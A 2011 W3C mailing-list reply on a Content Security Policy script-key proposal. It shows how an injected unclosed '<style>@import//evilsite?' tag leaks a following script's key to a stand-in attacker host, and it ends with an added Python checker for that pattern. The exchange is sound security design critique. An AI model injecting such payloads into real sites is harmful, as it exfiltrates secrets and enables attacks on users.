
Re: [Content Security Policy] Proposal to move the debate forward

From: gaz Heyes <gazheyes@gmail.com>
Date: Fri, 28 Jan 2011 11:32:16 +0000
Message-ID: <AANLkTikYX-m+D78RmTrktF4s9c66bjj1ePZifWPY6S9Y@mail.gmail.com>
To: Gervase Markham <gerv@mozilla.org>
Cc: Brandon Sterne <bsterne@mozilla.com>, public-web-security@w3.org

On 28 January 2011 11:18, Gervase Markham <gerv@mozilla.org> wrote:

> <script> /* '" SCRIPT_KEY_HERE */ var valid_script = 0; ... </script>
>
> But I agree that's a bit of a pain to do. We could make it so that the only
> valid script-keys were ones which began "' ... !
>

Ah wait hehe I already know how to send that data remotely:-

 INJECTION HERE
<script> /* '" SCRIPT_KEY_HERE */ var valid_script = 0; ... </script>

Injection:-
<style>@import//evilsite?

So yeah well and truly pwnd, can we have start and end markers now? :D
Received on Friday, 28 January 2011 11:32:48 GMT
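
An added example, not part of the original message or of the CSP proposal: a server-side check in Python that flags a rendered page where the script key ends up inside the content of a non-script raw-text element, such as the unclosed `<style>` in the message above. The function name, sample key and template are constructed for illustration, and the regex scan is a simplified model of HTML tokenization (it ignores comments and quoted attribute values).

```python
import re

# Elements whose content the HTML tokenizer reads as text until the matching
# end tag; markup inside them (including a later <script>) is not parsed.
RAW_TEXT = ("script", "style", "textarea", "title", "xmp", "iframe",
            "noembed", "noframes")
OPEN_TAG = re.compile(r"<(%s)\b[^>]*>" % "|".join(RAW_TEXT), re.I)


def key_swallowed_by(html, script_key):
    """Return (element, offset) pairs for non-script raw-text elements whose
    content contains script_key, i.e. the key would be read as that
    element's text instead of as part of a script."""
    findings = []
    pos = 0
    while True:
        m = OPEN_TAG.search(html, pos)
        if m is None:
            return findings
        name = m.group(1).lower()
        close = re.compile(r"</%s\b" % name, re.I).search(html, m.end())
        # An element with no end tag runs to the end of the document.
        end = close.start() if close else len(html)
        if name != "script" and script_key in html[m.end():end]:
            findings.append((name, m.start()))
        pos = end


# Constructed sample data: the key and template are illustrative only.
SCRIPT_KEY = "k3y-constructed-sample"
TEMPLATE = ('<p>%s</p>\n<script> /* \'" ' + SCRIPT_KEY +
            ' */ var valid_script = 0; </script>')
CLEAN = TEMPLATE % "hello"
CLOSED = TEMPLATE % "<style>p{}</style>"
INJECTED = TEMPLATE % "<style>@import//evilsite?"

if __name__ == "__main__":
    for label, page in (("clean", CLEAN), ("closed", CLOSED),
                        ("injected", INJECTED)):
        print(label, key_swallowed_by(page, SCRIPT_KEY))
```
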
